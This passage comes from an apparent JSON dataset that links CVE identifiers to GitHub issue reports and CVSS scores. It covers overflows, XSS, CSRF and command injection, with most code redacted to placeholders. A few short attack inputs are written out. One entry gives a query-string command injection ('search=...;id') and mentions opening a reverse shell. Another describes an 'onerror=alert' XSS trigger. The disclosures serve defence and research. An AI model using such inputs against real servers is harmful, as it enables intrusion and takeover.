  33517. "CVE_ID": "CVE-2019-1010043",
  33518. "Issue_Url_old": "https://github.com/ec-/Quake3e/issues/9",
  33519. "Issue_Url_new": "https://github.com/ec-/quake3e/issues/9",
  33520. "Repo_new": "ec-/quake3e",
  33521. "Issue_Created_At": "2018-03-04T11:45:39Z",
  33522. "description": "Buffer overflow in cmd.c. A buffer overflow scenario can be created within cmd.c. The APITAG variable within the APITAG function is vulnerable to this attack. The APITAG variable assigns all the arguments within argv to a single variable, space delimited. URLTAG This variable has allotted NUMBERTAG bytes for characters as displayed below: URLTAG If we provide arguments with length NUMBERTAG this variable should overflow and cause a crash.",
  33523. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33524. "severity": "CRITICAL",
  33525. "baseScore": 9.8,
  33526. "impactScore": 5.9,
  33527. "exploitabilityScore": 3.9
  33528. },
  33529. {
  33530. "CVE_ID": "CVE-2019-1010044",
  33531. "Issue_Url_old": "https://github.com/archivesunleashed/borg-reducer/issues/4",
  33532. "Issue_Url_new": "https://github.com/archivesunleashed/graphpass/issues/4",
  33533. "Repo_new": "archivesunleashed/graphpass",
  33534. "Issue_Created_At": "2018-03-04T11:59:36Z",
  33535. "description": "Buffer overflow in borg reducer. A buffer overflow scenario can be created within borg reducer. The dir and filepath variables within APITAG function is vulnerable to this attack. The output variable is set without any bounds at: URLTAG This is then later used in the APITAG function: URLTAG Both of the above mentioned variables are of size NUMBERTAG If we make output have a length NUMBERTAG a buffer overflow scenario will be produced and cause a crash.",
  33536. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33537. "severity": "CRITICAL",
  33538. "baseScore": 9.8,
  33539. "impactScore": 5.9,
  33540. "exploitabilityScore": 3.9
  33541. },
  33542. {
  33543. "CVE_ID": "CVE-2019-1010057",
  33544. "Issue_Url_old": "https://github.com/phaag/nfdump/issues/104",
  33545. "Issue_Url_new": "https://github.com/phaag/nfdump/issues/104",
  33546. "Repo_new": "phaag/nfdump",
  33547. "Issue_Created_At": "2018-03-17T16:18:29Z",
  33548. "description": "Multiple security vulnerabilities in minilzo.c, nffile_inline.c and nfx.c. Summary nfdump (commit APITAG is affected by multiple security vulnerabilities in: bin/minilzo.c bin/nffile_inline.c bin/nfx.c For obvious security reasons, I voluntarily omitted to mention the affected lines of codes, so the developers should have enough time to fix these issues. The program's author has been contacted with the necessary technical details. Description By crafting special malformed nfcapd input files, an attacker can crash the program by forcing it to dereference invalid memory addresses, and _may_ overflow heap chunks to get arbitrary code execution. Feel free to contact me if more information are necessary.",
  33549. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33550. "severity": "HIGH",
  33551. "baseScore": 7.8,
  33552. "impactScore": 5.9,
  33553. "exploitabilityScore": 1.8
  33554. },
  33555. {
  33556. "CVE_ID": "CVE-2019-1010062",
  33557. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/44",
  33558. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/44",
  33559. "Repo_new": "pluck-cms/pluck",
  33560. "Issue_Created_At": "2017-04-11T17:52:00Z",
  33561. "description": "FILETAG Please fix it ASAP and contact me to get more details(i did not find you email) : My email: EMAILTAG",
  33562. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33563. "severity": "CRITICAL",
  33564. "baseScore": 9.8,
  33565. "impactScore": 5.9,
  33566. "exploitabilityScore": 3.9
  33567. },
  33568. {
  33569. "CVE_ID": "CVE-2019-1010091",
  33570. "Issue_Url_old": "https://github.com/tinymce/tinymce/issues/4394",
  33571. "Issue_Url_new": "https://github.com/tinymce/tinymce/issues/4394",
  33572. "Repo_new": "tinymce/tinymce",
  33573. "Issue_Created_At": "2018-05-15T09:17:48Z",
  33574. "description": "Cross site Scripting (XSS) issue in media element. I would like to request a security bug What is the current behavior? Tinymce is prone to inappropriate validation of user input in process of media element creation. Below I described APITAG which shows a way to execute arbitrary APITAG code self XSS. Steps to reproduce: (It can be tested at: URLTAG or URLTAG however this vulnerability behaves slightly different between those sites NUMBERTAG Click Insert > Media NUMBERTAG Type \"a\" in source and change active tab to embed APITAG NUMBERTAG Edit generated by tinymce code by adding \"onerror=alert NUMBERTAG APITAG NUMBERTAG Create media element APITAG What is the expected behavior? After few APITAG executions NUMBERTAG times) media element becomes properly sanitised. Moreover : After XSS executes, any try of editing malicious media element makes editor unresponsive for the user. FILETAG Which versions of APITAG and which browser / OS are affected by this issue? Did this work in previous versions of APITAG Affected version: _at least NUMBERTAG Tested Browsers: Chrome, Firefox OS: APITAG High Sierra",
  33575. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33576. "severity": "MEDIUM",
  33577. "baseScore": 6.1,
  33578. "impactScore": 2.7,
  33579. "exploitabilityScore": 2.8
  33580. },
  33581. {
  33582. "CVE_ID": "CVE-2019-1010094",
  33583. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/65",
  33584. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/65",
  33585. "Repo_new": "domainmod/domainmod",
  33586. "Issue_Created_At": "2018-05-29T07:53:33Z",
  33587. "description": "There is three CSRF vulnerability that can add the administrator account or change the read only user to admin or change admin password. After the administrator logged in, open the following three page. change password: FILETAG ERRORTAG add the administrator account add a read only user FILETAG ERRORTAG change the read only user to admin FILETAG ERRORTAG",
  33588. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33589. "severity": "HIGH",
  33590. "baseScore": 8.8,
  33591. "impactScore": 5.9,
  33592. "exploitabilityScore": 2.8
  33593. },
  33594. {
  33595. "CVE_ID": "CVE-2019-1010127",
  33596. "Issue_Url_old": "https://github.com/vcftools/vcftools/issues/141",
  33597. "Issue_Url_new": "https://github.com/vcftools/vcftools/issues/141",
  33598. "Repo_new": "vcftools/vcftools",
  33599. "Issue_Created_At": "2019-07-29T20:59:10Z",
  33600. "description": "CVETAG , CVETAG . Two CVEs, CVETAG CVETAG and CVETAG CVETAG have been created for vcftools. I believe NUMBERTAG to be a duplicate of NUMBERTAG Based on the stack trace provided here URLTAG , this is a very similar issue to CVETAG , discussed in URLTAG I believe that the following commits address the issue in NUMBERTAG URLTAG URLTAG URLTAG URLTAG",
  33601. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33602. "severity": "HIGH",
  33603. "baseScore": 7.8,
  33604. "impactScore": 5.9,
  33605. "exploitabilityScore": 1.8
  33606. },
  33607. {
  33608. "CVE_ID": "CVE-2019-1010161",
  33609. "Issue_Url_old": "https://github.com/DCIT/perl-Crypt-JWT/issues/3",
  33610. "Issue_Url_new": "https://github.com/dcit/perl-crypt-jwt/issues/3",
  33611. "Repo_new": "dcit/perl-crypt-jwt",
  33612. "Issue_Created_At": "2016-04-26T22:54:21Z",
  33613. "description": "APITAG should not require a key?. If I have the following JWT: APITAG \u2026 and I put that into FILETAG it parses into something useful. I don\u2019t see anything in this module that does this \u2026 am I missing something? APITAG has the same issue.)",
  33614. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33615. "severity": "CRITICAL",
  33616. "baseScore": 9.8,
  33617. "impactScore": 5.9,
  33618. "exploitabilityScore": 3.9
  33619. },
  33620. {
  33621. "CVE_ID": "CVE-2019-1010176",
  33622. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2476",
  33623. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2476",
  33624. "Repo_new": "jerryscript-project/jerryscript",
  33625. "Issue_Created_At": "2018-08-16T15:19:04Z",
  33626. "description": "Heap buffer overflow in lit_char_to_utf8_bytes. Version: APITAG Build command: CODETAG Testcase: APITAG Where testcase is as following: APITAG ( APITAG in hex). Stack trace: ERRORTAG",
  33627. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33628. "severity": "CRITICAL",
  33629. "baseScore": 9.8,
  33630. "impactScore": 5.9,
  33631. "exploitabilityScore": 3.9
  33632. },
  33633. {
  33634. "CVE_ID": "CVE-2019-1010179",
  33635. "Issue_Url_old": "https://github.com/remko/phkp/issues/1",
  33636. "Issue_Url_new": "https://github.com/remko/phkp/issues/1",
  33637. "Repo_new": "remko/phkp",
  33638. "Issue_Created_At": "2018-07-18T13:45:41Z",
  33639. "description": "RCE: query string is not sanatized.. Hi, the http query string is not sanatized. An attacker could inject a command. Here is an example that gives out the id command: /pks/lookup?search= EMAILTAG ;id&op=get It is possible to place a shell, or open a reverse shell or exchange gpg keys or execute other commands",
  33640. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33641. "severity": "CRITICAL",
  33642. "baseScore": 9.8,
  33643. "impactScore": 5.9,
  33644. "exploitabilityScore": 3.9
  33645. },
  33646. {
  33647. "CVE_ID": "CVE-2019-1010193",
  33648. "Issue_Url_old": "https://github.com/hisiphp/hisiphp/issues/3",
  33649. "Issue_Url_new": "https://github.com/hisiphp/hisiphp/issues/3",
  33650. "Repo_new": "hisiphp/hisiphp",
  33651. "Issue_Created_At": "2018-09-26T08:05:37Z",
  33652. "description": "csrf and xss Vulnerability. XSS: FILETAG FILETAG FILETAG CSRF: poc: CODETAG When the super administrator accesses, a tyonghu management account will be added in the background.",
  33653. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33654. "severity": "MEDIUM",
  33655. "baseScore": 6.1,
  33656. "impactScore": 2.7,
  33657. "exploitabilityScore": 2.8
  33658. },
  33659. {
  33660. "CVE_ID": "CVE-2019-1010239",
  33661. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/315",
  33662. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/315",
  33663. "Repo_new": "davegamble/cjson",
  33664. "Issue_Created_At": "2018-12-12T01:37:53Z",
  33665. "description": "Segmentation Fault after calling APITAG Hello. I think i found a bug in cJSON NUMBERTAG I attached source code to replay this bug. I used below script to build this code file. And also I built cJSON library with address sanitizer option and m NUMBERTAG clang o bug.o c bug.c DCJSON_API_VISIBILITY DCJSON_EXPORT_SYMBOLS DENABLE_LOCALES m NUMBERTAG g std=c NUMBERTAG pedantic Wall Wextra Werror Wstrict prototypes Wwrite strings Wshadow Winit self Wcast align Wformat NUMBERTAG Wmissing prototypes Wstrict overflow NUMBERTAG Wcast qual Wundef Wswitch default Wconversion Wc++ compat fstack protector strong Wcomma Wdouble promotion Wparentheses Wunused macros Wmissing variable declarations Wused but marked unused Wswitch enum fvisibility=hidden clang m NUMBERTAG g fsanitize=address std=c NUMBERTAG pedantic Wall Wextra Werror Wstrict prototypes Wwrite strings Wshadow Winit self Wcast align Wformat NUMBERTAG Wmissing prototypes Wstrict overflow NUMBERTAG Wcast qual Wundef Wswitch default Wconversion Wc++ compat fstack protector strong Wcomma Wdouble promotion Wparentheses Wunused macros Wmissing variable declarations Wused but marked unused Wswitch enum fvisibility=hidden Wl, rpath,${libcjonlibrarypath} rdynamic lm o bug bug.o . APITAG FILETAG",
  33666. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  33667. "severity": "HIGH",
  33668. "baseScore": 7.5,
  33669. "impactScore": 3.6,
  33670. "exploitabilityScore": 3.9
  33671. },
  33672. {
  33673. "CVE_ID": "CVE-2019-1010258",
  33674. "Issue_Url_old": "https://github.com/memononen/nanosvg/issues/136",
  33675. "Issue_Url_new": "https://github.com/memononen/nanosvg/issues/136",
  33676. "Repo_new": "memononen/nanosvg",
  33677. "Issue_Created_At": "2018-11-16T15:09:47Z",
  33678. "description": "Potential memory corruption bug in APITAG This simple Proof of Concept APITAG crashes nanosvg. In this snippet it is clear why this happens: ERRORTAG sscanf tries to parse the string, and writes arbitrary number of '%' or ' ' into the s1 or s2 buffer. The buffer overflows and triggers a segfault. This could lead to memory corruption and/or denial of service. Regards bitwave CC: MENTIONTAG for the fuzzing",
  33679. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33680. "severity": "MEDIUM",
  33681. "baseScore": 6.5,
  33682. "impactScore": 3.6,
  33683. "exploitabilityScore": 2.8
  33684. },
  33685. {
  33686. "CVE_ID": "CVE-2019-1010266",
  33687. "Issue_Url_old": "https://github.com/lodash/lodash/issues/3359",
  33688. "Issue_Url_new": "https://github.com/lodash/lodash/issues/3359",
  33689. "Repo_new": "lodash/lodash",
  33690. "Issue_Created_At": "2017-09-05T12:12:44Z",
  33691. "description": "Vulnerable Regular Expression. The following regular expression used in FILETAG is vulnerable to APITAG APITAG This regex is called by multiple methods exposed to the users such as APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  33692. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  33693. "severity": "MEDIUM",
  33694. "baseScore": 6.5,
  33695. "impactScore": 3.6,
  33696. "exploitabilityScore": 2.8
  33697. },
  33698. {
  33699. "CVE_ID": "CVE-2019-1010299",
  33700. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/53566",
  33701. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/53566",
  33702. "Repo_new": "rust-lang/rust",
  33703. "Issue_Created_At": "2018-08-21T16:58:00Z",
  33704. "description": "APITAG has unsound Debig implementation. Found by APITAG The following code causes UB (not observable through crashes, but still): APITAG This will create a APITAG ring with capacity NUMBERTAG then turn that into a slice for Iter , and then print that entire slice. Run it in Miri URLTAG to see for yourself APITAG is in the \"tools\" menu).",
  33705. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  33706. "severity": "MEDIUM",
  33707. "baseScore": 5.3,
  33708. "impactScore": 1.4,
  33709. "exploitabilityScore": 3.9
  33710. },
  33711. {
  33712. "CVE_ID": "CVE-2019-1010300",
  33713. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/127",
  33714. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/127",
  33715. "Repo_new": "mz-automation/libiec61850",
  33716. "Issue_Created_At": "2019-02-25T13:26:26Z",
  33717. "description": "negative size param in server_example_ca.c. Hi team, Their are negative size param in APITAG APITAG NUMBERTAG ersion has this problem. Snip FILETAG ERRORTAG",
  33718. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  33719. "severity": "HIGH",
  33720. "baseScore": 7.5,
  33721. "impactScore": 3.6,
  33722. "exploitabilityScore": 3.9
  33723. },
  33724. {
  33725. "CVE_ID": "CVE-2019-1010304",
  33726. "Issue_Url_old": "https://github.com/mirumee/saleor/issues/3768",
  33727. "Issue_Url_new": "https://github.com/saleor/saleor/issues/3768",
  33728. "Repo_new": "saleor/saleor",
  33729. "Issue_Created_At": "2019-02-25T10:55:24Z",
  33730. "description": "Sensitive data exposed via Graphql. By default Saleor exposes sensitive business information like: APITAG { quantity: Int! APITAG Int! APITAG Money APITAG Int! margin: Int APITAG Int APITAG APITAG } I hope nobody is running Saleor out there with theses fields exposed to public.",
  33731. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  33732. "severity": "MEDIUM",
  33733. "baseScore": 5.3,
  33734. "impactScore": 1.4,
  33735. "exploitabilityScore": 3.9
  33736. },
  33737. {
  33738. "CVE_ID": "CVE-2019-1010305",
  33739. "Issue_Url_old": "https://github.com/kyz/libmspack/issues/27",
  33740. "Issue_Url_new": "https://github.com/kyz/libmspack/issues/27",
  33741. "Repo_new": "kyz/libmspack",
  33742. "Issue_Created_At": "2019-02-18T08:14:41Z",
  33743. "description": "Heap buffer overflow in APITAG Description: Function APITAG in libmspack has a heap buffer overflow problem( Out of Bound Read ). Affected version: libmspack NUMBERTAG alpha Details: In function APITAG , line NUMBERTAG APITAG will lead to out of bound read while extracting a crafted chm file. CODETAG Details with asan output: ERRORTAG poc file URLTAG Credit: APITAG of Venustech",
  33744. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  33745. "severity": "MEDIUM",
  33746. "baseScore": 5.5,
  33747. "impactScore": 3.6,
  33748. "exploitabilityScore": 1.8
  33749. },
  33750. {
  33751. "CVE_ID": "CVE-2019-1010315",
  33752. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/65",
  33753. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/65",
  33754. "Repo_new": "dbry/wavpack",
  33755. "Issue_Created_At": "2019-03-02T23:24:26Z",
  33756. "description": "Divide by zero in APITAG FILETAG Contains fuzzed input Running APITAG with APITAG extracted from the attachment triggers a SIGFPE due to divide by zero in APITAG URLTAG .",
  33757. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33758. "severity": "MEDIUM",
  33759. "baseScore": 5.5,
  33760. "impactScore": 3.6,
  33761. "exploitabilityScore": 1.8
  33762. },
  33763. {
  33764. "CVE_ID": "CVE-2019-1010316",
  33765. "Issue_Url_old": "https://github.com/leonnnn/pyxtrlock/issues/21",
  33766. "Issue_Url_new": "https://github.com/leonnnn/pyxtrlock/issues/21",
  33767. "Repo_new": "leonnnn/pyxtrlock",
  33768. "Issue_Created_At": "2019-02-26T12:01:19Z",
  33769. "description": "Padlock displayed but keyboard not blocked. Hi I have installed pyxtrlock in a fedora laptop, and, when executing it, the browser is displayed with the padlock and i cant do anything on it, great... But, if i hit any keyboard shortcut, or if i hit the activity bar with the mouse, i can still use the computer as normal. It looks like it only blocks the interaction of the keyboard with the browser Am i doing something wrong? Is there any config i need to apply? Thanks",
  33770. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  33771. "severity": "HIGH",
  33772. "baseScore": 7.8,
  33773. "impactScore": 5.9,
  33774. "exploitabilityScore": 1.8
  33775. },
  33776. {
  33777. "CVE_ID": "CVE-2019-1010317",
  33778. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/66",
  33779. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/66",
  33780. "Repo_new": "dbry/wavpack",
  33781. "Issue_Created_At": "2019-03-04T19:43:30Z",
  33782. "description": "Uninitialized Read in APITAG FILETAG contains fuzzed input The parsing of the attached file uninit caff.wav leads to a read of an uninitialized location in memory. The uninitialized read can be uncovered using a tool such as FILETAG or FILETAG . For example: ERRORTAG It appears that this is an uninitialized read of the field APITAG on this line URLTAG .",
  33783. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33784. "severity": "MEDIUM",
  33785. "baseScore": 5.5,
  33786. "impactScore": 3.6,
  33787. "exploitabilityScore": 1.8
  33788. },
  33789. {
  33790. "CVE_ID": "CVE-2019-1010319",
  33791. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/68",
  33792. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/68",
  33793. "Repo_new": "dbry/wavpack",
  33794. "Issue_Created_At": "2019-03-05T18:54:19Z",
  33795. "description": "Uninitialized Read (and Divide by Zero) in APITAG FILETAG contains fuzzed input The parsing of the attached file uninit divzero waveheader.wav leads to a read of an uninitialized location in memory. The uninitialized read sometimes further leads to a divide by zero error. The uninitialized read can be uncovered using a tool such as FILETAG or FILETAG . For example: ERRORTAG It appears that this is an uninitialized read of the field APITAG on this line URLTAG . This sometimes leads to a subsequent divide by zero on this line URLTAG I guess the division instruction may or may not be executed based on what value is read for APITAG .",
  33796. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33797. "severity": "MEDIUM",
  33798. "baseScore": 5.5,
  33799. "impactScore": 3.6,
  33800. "exploitabilityScore": 1.8
  33801. },
  33802. {
  33803. "CVE_ID": "CVE-2019-10181",
  33804. "Issue_Url_old": "https://github.com/AdoptOpenJDK/IcedTea-Web/issues/327",
  33805. "Issue_Url_new": "https://github.com/adoptopenjdk/icedtea-web/issues/327",
  33806. "Repo_new": "adoptopenjdk/icedtea-web",
  33807. "Issue_Created_At": "2019-07-22T11:46:06Z",
  33808. "description": "upcoming security release NUMBERTAG Three security issues were found in ITW, and have been discussed and are going to be fixed. Those are CVETAG CVETAG CVETAG Unembargo date was set to NUMBERTAG That day I will make PR for itw NUMBERTAG and head.",
  33809. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33810. "severity": "HIGH",
  33811. "baseScore": 8.1,
  33812. "impactScore": 5.9,
  33813. "exploitabilityScore": 2.2
  33814. },
  33815. {
  33816. "CVE_ID": "CVE-2019-10217",
  33817. "Issue_Url_old": "https://github.com/ansible/ansible/issues/56269",
  33818. "Issue_Url_new": "https://github.com/ansible/ansible/issues/56269",
  33819. "Repo_new": "ansible/ansible",
  33820. "Issue_Created_At": "2019-05-09T14:08:26Z",
  33821. "description": "gcp_storage_object fails with service_account_contents option. SUMMARY When I use APITAG option, the module call fails. When adding a debug task with APITAG the json content is properly displayed. ISSUE TYPE Bug Report COMPONENT NAME gcp_storage_object.py ANSIBLE VERSION CODETAG CONFIGURATION CODETAG OS / ENVIRONMENT N/A STEPS TO REPRODUCE yaml name: Trigger gitlab upload of gitlab secrets file gcp_storage_object: action: upload bucket: \"{{ gitlab_backup_gcs_name }}\" src: PATHTAG dest: \"{{ APITAG }}_gitlab APITAG auth_kind: \"serviceaccount\" service_account_contents: \"{{ lookup('file', gitlab_sa_key_path) }}\" EXPECTED RESULTS File uploaded ACTUAL RESULTS ERRORTAG",
  33822. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  33823. "severity": "MEDIUM",
  33824. "baseScore": 6.5,
  33825. "impactScore": 3.6,
  33826. "exploitabilityScore": 2.8
  33827. },
  33828. {
  33829. "CVE_ID": "CVE-2019-10249",
  33830. "Issue_Url_old": "https://github.com/eclipse/xtext-xtend/issues/759",
  33831. "Issue_Url_new": "https://github.com/eclipse/xtext-xtend/issues/759",
  33832. "Repo_new": "eclipse/xtext-xtend",
  33833. "Issue_Created_At": "2019-03-26T15:43:58Z",
  33834. "description": "FILETAG FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code has existed since NUMBERTAG to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Comcast continues to inject its own code into websites you visit URLTAG (over HTTP) Source Locations URLTAG Original Report CVETAG This was originally responsibly disclosed privately, but I was asked to make it public by MENTIONTAG Public Disclosure Option NUMBERTAG File for a CVE A project maintainer for this project should probably file for a CVE number to inform the public about this vulnerability in the build for this project. The goal is to inform the public that there was a potential for published build artifacts to have been maliciously compromised in earlier releases. If a maintainer on this project works for or is associated with a CNA, please have them file it with them: FILETAG Otherwise, an open source CVE should be filed for here: FILETAG Option NUMBERTAG Manually validate the release artifacts If this project's build is fully reproducible URLTAG . An alternative to filing for a CVE is to go back and build the earlier releases (with the HTTPS patch applied) to confirm the artifacts were not tampered when they were built. This can be done by comparing the hashes of the artifacts built locally with the ones published. If the hashes of all previous artifacts match those that are published, you can safely assume that the releases were not tampered with. Again, this assumes that the build if fully reproducible and will require significantly more work.",
  33835. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33836. "severity": "HIGH",
  33837. "baseScore": 8.1,
  33838. "impactScore": 5.9,
  33839. "exploitabilityScore": 2.2
  33840. },
  33841. {
  33842. "CVE_ID": "CVE-2019-10262",
  33843. "Issue_Url_old": "https://github.com/8test/pentest/issues/2",
  33844. "Issue_Url_new": "https://github.com/8test/pentest/issues/2",
  33845. "Repo_new": "8test/pentest",
  33846. "Issue_Created_At": "2019-03-25T15:09:53Z",
  33847. "description": "SQL injection NUMBERTAG for Bluecms. FILETAG",
  33848. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33849. "severity": "CRITICAL",
  33850. "baseScore": 9.8,
  33851. "impactScore": 5.9,
  33852. "exploitabilityScore": 3.9
  33853. },
  33854. {
  33855. "CVE_ID": "CVE-2019-10276",
  33856. "Issue_Url_old": "https://github.com/cobub/razor/issues/168",
  33857. "Issue_Url_new": "https://github.com/cobub/razor/issues/168",
  33858. "Repo_new": "cobub/razor",
  33859. "Issue_Created_At": "2019-03-29T05:14:23Z",
  33860. "description": "Vulnerability: Cobub Razor file upload. Vulnerability: Cobub Razor file upload Detail: PATHTAG Line NUMBERTAG Determine whether $_FILES is empty APITAG the document root directory+folder+name >upload file. File type is not restricted. ERRORTAG POC: Construct an upload POST\uff1a ERRORTAG Upload success: CODETAG FILETAG",
  33861. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33862. "severity": "CRITICAL",
  33863. "baseScore": 9.8,
  33864. "impactScore": 5.9,
  33865. "exploitabilityScore": 3.9
  33866. },
  33867. {
  33868. "CVE_ID": "CVE-2019-10644",
  33869. "Issue_Url_old": "https://github.com/hyyyp/HYBBS2/issues/3",
  33870. "Issue_Url_new": "https://github.com/hyyyp/hybbs2/issues/3",
  33871. "Repo_new": "hyyyp/hybbs2",
  33872. "Issue_Created_At": "2019-03-29T14:38:49Z",
  33873. "description": "CSRF vulnerability which can add the administrator account. When the administrator logged in, open the page with poc , it can add the administrator account. Here, my test site's url is FILETAG . poc: html code below: CODETAG FILETAG",
  33874. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33875. "severity": "HIGH",
  33876. "baseScore": 8.8,
  33877. "impactScore": 5.9,
  33878. "exploitabilityScore": 2.8
  33879. },
  33880. {
  33881. "CVE_ID": "CVE-2019-10646",
  33882. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/682",
  33883. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/682",
  33884. "Repo_new": "wolfcms/wolfcms",
  33885. "Issue_Created_At": "2019-03-27T13:44:43Z",
  33886. "description": "Cross Site Scripting | APITAG NUMBERTAG Hello Team, I would like to report a vulnerability (cross site scripting) which I have observed in current version NUMBERTAG Cross Site Scripting (XSS) allows attacker to inject the malicious APITAG as user input and then malicious script can access any cookies, session tokens, or other sensitive information associated with impacted applications. Please refer URLTAG for more details. APITAG URL is URLTAG Steps to reproduce NUMBERTAG Browse to URLTAG to add the snippet NUMBERTAG Insert payload (malicious APITAG APITAG OR APITAG in Name text box APITAG NUMBERTAG Payload will be saved and malicious APITAG will be executed wherever affected snippet is loaded APITAG Best Regards, Pramod Rana URLTAG varchashva [at] gmail [dot] com",
  33887. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33888. "severity": "MEDIUM",
  33889. "baseScore": 6.1,
  33890. "impactScore": 2.7,
  33891. "exploitabilityScore": 2.8
  33892. },
  33893. {
  33894. "CVE_ID": "CVE-2019-10649",
  33895. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1533",
  33896. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1533",
  33897. "Repo_new": "imagemagick/imagemagick",
  33898. "Issue_Created_At": "2019-03-28T15:41:27Z",
  33899. "description": "memory leak in APITAG of coders/svg.c. Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a memory leak vulnerability in function APITAG of coders/svg.c. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
  33900. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33901. "severity": "MEDIUM",
  33902. "baseScore": 5.5,
  33903. "impactScore": 3.6,
  33904. "exploitabilityScore": 1.8
  33905. },
  33906. {
  33907. "CVE_ID": "CVE-2019-10650",
  33908. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1532",
  33909. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1532",
  33910. "Repo_new": "imagemagick/imagemagick",
  33911. "Issue_Created_At": "2019-03-28T15:33:16Z",
